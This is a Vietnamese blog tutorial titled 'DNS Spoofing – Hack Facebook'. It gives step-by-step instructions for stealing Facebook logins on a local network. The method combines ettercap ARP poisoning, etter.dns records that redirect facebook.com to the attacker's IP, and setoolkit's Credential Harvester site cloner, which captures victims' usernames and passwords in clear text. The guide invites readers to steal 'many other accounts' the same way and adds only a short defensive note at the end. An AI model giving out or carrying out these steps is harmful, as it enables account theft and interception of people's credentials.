DNS Spoofing – Hack Facebook

Mình xin nói sơ qua về DNS – Domain Name System – Hệ thống phân giải tên miền.

Khi bạn vào web browser gõ facebook.com thì hệ thống DNS sẽ phân giải cho bạn sang địa chỉ IP để bạn có thể giao tiếp, truyền tải dữ liệu trên mạng.

Bài này mình sẽ chia làm 2 phần:

Phần 1: Sử dụng ettercap để thực hiện DNS Spoofing

Phần 2: Sử dụng Setoolkit và Ettercap để thực hiện đánh cắp tài khoản facebook.

Thực hiện:

Phần 1: Sử dụng ettercap để thực hiện DNS Spoofing

Trước tiên, mình sẽ ping facebook.com xem thử địa chỉ IP tương ứng với tên miền facebook.com là gì

facebook zpsf1b7f07c - DNS Spoofing - Hack Facebook

Tiếp đến, vào Kali Linux thực hiện Enable IP Forwarding.

#echo 1 > /proc/sys/net/ipv4/ip_forward

ipforwarding zps9e90c910 - DNS Spoofing - Hack Facebook

Tiếp theo sửa file etter.dns.

Sử dụng câu lệnh locate etter.dns xem hiện tại nó đang ở đâu. Xong thì tiến hành vào thêm các record sau:

facebook.com A 192.168.0.109

*.facebook.com A 192.168.0.109

Với địa chỉ 192.168.0.109 là IP máy Attacker.

etterdns zps6db36b10 - DNS Spoofing - Hack Facebook

Note: Có thể nằm ở địa chỉ /usr/local/share/ettercap/etter.dns với các phiên bản Backtrack 5

Xong thì lưu lại và thoát :wq

facebook2 zpscdfe6288 - DNS Spoofing - Hack Facebook

Thực hiện dns spoofing bằng câu lệnh

#ettercap -T -q -M arp:remote -P dns_spoof //

ettercap zpsac23a3f7 - DNS Spoofing - Hack Facebook

Sau đó vào máy client, cấp lại địa chỉ bằng câu lệnh >ipconfig /renew

ettercap3 zps6c7aa75f - DNS Spoofing - Hack Facebook

Bây giờ lên PC client truy cập vào facebook.com bạn sẽ thấy nó vẫn truy cập bình thường. Nhưng khi tiến hành ping đến facebook.com thì IP trả lời lại là 192.168.0.109 – IP máy Attacker.

Xem thêm:  Tổng hợp TUT Trick Facebook mới nhất 2017

pingfacebook2 zps52486770 - DNS Spoofing - Hack Facebook

OK. Vậy là bạn đã thành công trong việc lái dữ liệu qua máy bạn, giờ chúng ta sẽ tiến hành đánh cắp tài khoản Facebook.

Phần 2: Sử dụng setoolkit và ettercap để thực hiện đánh cắp tài khoản facebook.

Công cụ sử dụng:

setoolkit: clone website, capture username/password

ettercap: Scan hosts + ARP poisoning (ARP spoofing) + DNS spoofing + Sniff (nghe lén).

Video demo: Youtube

Hướng dẫn bằng hình ảnh

Bật setoolkit

#/usr/share/set/setoolkit

setoolkit1 zps5d9f340a - DNS Spoofing - Hack Facebook

Đồng ý điều khoản sử dụng Bấm y -> Enter

setoolkit2 zps3d0fa4a2 - DNS Spoofing - Hack Facebook

Chọn 1) Social-Engineering Attacks

setoolkit3 zps2970c553 - DNS Spoofing - Hack Facebook

Chọn 2) Website Attack Ventors

setoolkit4 zpsebc6d6a0 - DNS Spoofing - Hack Facebook

Chọn 3) Credential Harvester Attack Method

setoolkit5 zpsb689a24b - DNS Spoofing - Hack Facebook

Chọn 2) Site Cloner

setoolkit6 zpsaacc10a1 - DNS Spoofing - Hack Facebook

Đánh địa chỉ IP của Attacker: 192.168.0.109

setoolkit7 zpsf98984aa - DNS Spoofing - Hack Facebook

Đánh đường dẫn muốn clone website: https://www.facebook.com

setoolkit8 zpsb271be43 - DNS Spoofing - Hack Facebook

Xong thì bật Terminal khác, đánh ettercap -G để bật cấu hình ettercap bằng giao diện

Chọn Sniff-> Unified sniffing

ettercap01 zps46acda04 - DNS Spoofing - Hack Facebook

Chọn cổng để nghe lén: eth0

ettercap02 zpsa0ff9811 - DNS Spoofing - Hack Facebook

Chọn Hosts-> Scan for hosts

Host-> Hosts List

ettercap03 zpsfeb18f68 - DNS Spoofing - Hack Facebook

Chọn 2 địa chỉ để tiến hành nghe lén

ettercap04 zps33900ce2 - DNS Spoofing - Hack Facebook

Thực hiện ARP possoning (ARP spoofing)

ettercap05 zps5f44c72f - DNS Spoofing - Hack Facebook

Click chọn Sniff remote connections.

ettercap06 zps4a8b5d82 - DNS Spoofing - Hack Facebook

Vào /etc/ettercap/etter.dns thêm vào 2 dòng:

facebook.com A 192.168.0.109

*.facebook.com A 192.168.0.109

ettercap09 zps4dedb32d - DNS Spoofing - Hack Facebook

Vào Plugins-> Manage the plugins

ettercap07 zps06dab6cc - DNS Spoofing - Hack Facebook

Click vào dns_spoof để bật tính năng này

ettercap10 zpsf3eb54b9 - DNS Spoofing - Hack Facebook

Start sniffing

ettercap11 zpsa3c03802 - DNS Spoofing - Hack Facebook

Tại máy client mở web browser vào facebook.com, điền username/password

facebook zpse129988d - DNS Spoofing - Hack Facebook

setoolkit sẽ bắt được username/password này

facebook2 zps28643404 - DNS Spoofing - Hack Facebook

Thông tin username/password hiện dưới dạng clear-text như trên, vậy là bạn đã có tài khoản facebook của client.

Cập nhật ngày 15/9/2015:

Ở phiên bản mới Kali 2.0, khi clone site về sẽ được lưu trong đường dẫn /var/www/ bạn tiến hành copy những file này vào đường dẫn /var/www/html sau đó tiến hành bình thường:

Xem thêm:  Hướng dẫn tạo ảnh Facebook trong suốt cằm trên tay với Picsart

Note: nhớ change quyền để đọc và viết cho các file này:

#cd /var/www/html
#chmod 777 ./*

gồm 3 file là:
– index.html : giao diện của facebook.com
– post.php: hàm để lấy username/password khi bạn nhập vào và lưu ở file haverster_*.txt
– harvester_ngày_giờ.txt : lưu thông tin thu được.

clone1 - DNS Spoofing - Hack Facebook

Bằng cách tương tự các bạn có thể đánh cắp nhiều tài khoản khác.

Cách phòng chống DNS Spoofing:

Ngoài 2 cách ở bài ARP spoofing là triển khai port-security và DAI các bạn nên triển khai thêm DHCP snooping để ngăn chặn cấp DHCP giả mạo.

P/s: Như các bạn đã thấy, nếu attacker đã vào được trong mạng nội bộ của chúng ta mà có ý đồ đen tối thì có nhiều công cụ để khai khác thông tin của công ty mình. Như vậy, nếu nhân viên nào có ý đồ phá hoại công ty thì cũng khá vất vả để điều tra.

Nhân tiện đây, bạn nào có sử dụng công cụ hay chương trình giám sát nào bổ ích thì chia sẻ cho anh em biết với nhé.

Thân,